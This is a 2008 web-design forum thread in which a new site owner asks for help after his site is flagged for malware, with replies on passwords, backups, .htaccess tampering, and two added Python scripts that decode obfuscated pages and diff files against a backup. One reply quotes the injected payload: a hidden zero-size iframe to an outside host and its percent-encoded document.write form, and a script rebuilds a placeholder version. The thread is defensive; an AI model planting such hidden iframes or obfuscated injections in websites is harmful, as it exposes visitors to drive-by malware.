Site Malware Infection--Please Help

12-18-2008, 06:52 PM
Hello. I received a troubling email from a user of my website this morning, notifying me that my website has been infected by malware and is dangerous to its visitors. I am new to web design and do not know how this happened, or how to remove it. I noticed last night that a strange glitch was causing my site's home page, along with any pages linked to it named "index", to have their tables misaligned. Since I had added some code I found online for favicons to the home page of the site on its last update a week earlier, I thought that might be responsible. (That code was <link rel="shortcut icon" href="/favicon.ico">) I tried removing this code and re-uploading the affected pages. This seemed to correct the misalignment, but I am worried that a worse problem has arisen. Is there anyone who can give me any advice? Any suggestions for how to make my website safe again would be very appreciated!

(If relevant, my website URL is www.Nosgoth.net.)

12-18-2008, 07:13 PM
A favicon wouldn't cause it to do that. Someone must have logged in and added other code.

If it is infected I won't click on the link you posted. My mom had to have me reinstall her computer because of stuff like this; she went on a baby shower website and got bombarded by self-installing trojans.

I suggest changing your passwords for your host login and uploading your site from your backup files.

Make sure your computer doesn't have any keyloggers that would save passwords.

12-18-2008, 07:36 PM
I found this in your code:

<iframe src="http://palech.com/index.php" width="0" height="0" style="display:none"></iframe>
It's the decryption of this:

<!-- HTML Encryption provided by iWEBTOOL.com -->
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%61%6C%65%63 %68%2E%63%6F%6D%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74% 3D%22%30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%6 5%3E'));
Did you put any of that there yourself? I suggest you contact your host and try to remove any code that looks like the above.
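Added example, not code from any poster in this thread: a Python scanner that statically peels the two obfuscation layers quoted above (a hex string split with '+x8a+' joins and decoded by parseInt(..,16) plus String.fromCharCode, then unescape('%XX...')) without executing any JavaScript, and reports iframes that are zero-sized or display:none. The sample page, its iframe host (malicious.invalid) and the stand-in decoder name `dec` are constructed assumptions.

```python
import re
from urllib.parse import quote, unquote

# Constructed sample (not the poster's real page); the host is a placeholder.
PAYLOAD = ('<iframe src="http://malicious.invalid/index.php" width="0" '
           'height="0" style="display:none"></iframe>')

def obfuscate_like_thread(markup):
    """Rebuild the thread's two layers: unescape('%XX..') inside a script, then that
    script as hex pairs split with '+x8a+'. 'dec' stands in for the real decoder."""
    layer2 = "<script>document.write(unescape('%s'));</script>" % quote(markup, safe='')
    hexed = layer2.encode('latin-1').hex().upper()
    chunks = [hexed[i:i + 7] for i in range(0, len(hexed), 7)]  # splits mid-pair
    return "var x8a='';var s='" + "'+x8a+'".join(chunks) + "';document.write(dec(s));"

SAMPLE_PAGE = "<html><body><p>Welcome</p>" + obfuscate_like_thread(PAYLOAD) + "</body></html>"

JOIN = re.compile(r"'\s*\+\s*[A-Za-z_$][\w$]*\s*\+\s*'")   # the '+x8a+' joins
HEX_STR = re.compile(r"'([0-9A-Fa-f]{16,})'")              # a long hex-only literal
UNESCAPE = re.compile(r"unescape\(\s*'([^']*)'\s*\)")      # unescape('%3C...')

def decode_layers(text, max_depth=5):
    """Statically peel hex-pair and %XX layers (no JS executed); returns every decoded string."""
    found, frontier = [], [text]
    for _ in range(max_depth):
        nxt = []
        for t in frontier:
            for h in HEX_STR.findall(JOIN.sub('', t)):   # layer 1: parseInt(..,16)+fromCharCode
                if len(h) % 2 == 0:
                    nxt.append(bytes.fromhex(h).decode('latin-1'))
            for u in UNESCAPE.findall(t):                 # layer 2: unescape('%XX')
                nxt.append(unquote(u))
        if not nxt:
            break
        found.extend(nxt)
        frontier = nxt
    return found

IFRAME = re.compile(r'<iframe[^>]*\bsrc=["\']([^"\']+)["\'][^>]*>', re.I)
HIDDEN = re.compile(r'width=["\']?0\b|height=["\']?0\b|display\s*:\s*none', re.I)

def find_hidden_iframes(page):
    """src of each zero-sized or display:none iframe in the page or any decoded layer."""
    hits = set()
    for t in [page] + decode_layers(page):
        for m in IFRAME.finditer(t):
            if HIDDEN.search(m.group(0)):
                hits.add(m.group(1))
    return sorted(hits)
```

Run it over each downloaded HTML file; any non-empty result is a page to compare against your backup copy.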

12-20-2008, 01:36 PM
Thank you both very much! If Windows’ AutoComplete feature counts as what you mean by a keylogger, I did have one that had memorized the password for my website. I have now changed my password and re-uploaded everything from the files on my hard drive. It appears to be working now. Hopefully it will continue to.

12-20-2008, 04:48 PM
I was having the same problem with one of my sites. Apparently, someone gained access to an FTP login, and was changing the .htaccess file to redirect to a bogus anti-virus site. So while there may have been nothing wrong with your site, it's the best idea to make sure this .htaccess file is not changed, and the login passwords, along with FTP passwords are changed.

12-20-2008, 09:52 PM
I would second what Aero says: contact your host. They know these things and can often fix them for you. Of course a good password is paramount though. I had this happen to a client, because they chose a dictionary word as a password, and it was hacked. It's pesky, because you don't always know where the affected areas are, and your support might be able to track down when it occurred, which files were changed, and clean it up much faster (and more thoroughly) than you can on your own.

Of course if you have little or no support, check the .htaccess and look at every file and folder!
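Added example, not from any poster in this thread, for the advice in the last two posts: hash the known-good backup and the hosted copy to list which files were added or changed, and flag .htaccess redirect directives that point at hosts you do not own. The file contents, the .htaccess text and both hostnames are constructed placeholders.

```python
import hashlib, os, re, tempfile

def hash_tree(root):
    """Relative path -> SHA-256 for every file under root."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, 'rb') as f:
                digests[os.path.relpath(full, root)] = hashlib.sha256(f.read()).hexdigest()
    return digests

def diff_trees(baseline, current):
    """Files added, removed or modified on the host relative to the known-good backup."""
    return {'added': sorted(set(current) - set(baseline)),
            'removed': sorted(set(baseline) - set(current)),
            'modified': sorted(p for p in baseline if p in current and baseline[p] != current[p])}

REDIRECT = re.compile(r'^\s*(?:RewriteRule|Redirect(?:Match)?)\s+.*?(https?://[^\s\]]+)', re.I | re.M)

def external_redirects(htaccess_text, own_hosts):
    """Redirect targets in an .htaccess that point at a host you do not own."""
    hits = []
    for m in REDIRECT.finditer(htaccess_text):
        host = re.sub(r'^https?://', '', m.group(1), flags=re.I).split('/')[0].lower()
        if host not in own_hosts:
            hits.append(m.group(1))
    return hits

# Constructed .htaccess; both hosts are placeholders.
HTACCESS = """RewriteEngine On
RewriteRule ^(.*)$ http://fake-antivirus.invalid/scan.php [R=302,L]
Redirect 301 /old.html http://www.mysite.invalid/new.html
"""

def demo():
    """Constructed demo: a known-good backup versus a tampered hosted copy."""
    backup = {'index.html': '<p>hi</p>', '.htaccess': 'Options -Indexes\n'}
    hosted = dict(backup, **{'index.html': '<p>hi</p><!-- injected -->', 'img/x.php': '<?php ?>'})
    with tempfile.TemporaryDirectory() as b, tempfile.TemporaryDirectory() as h:
        for root, files in ((b, backup), (h, hosted)):
            for rel, body in files.items():
                os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
                with open(os.path.join(root, rel), 'w') as f:
                    f.write(body)
        return diff_trees(hash_tree(b), hash_tree(h))
```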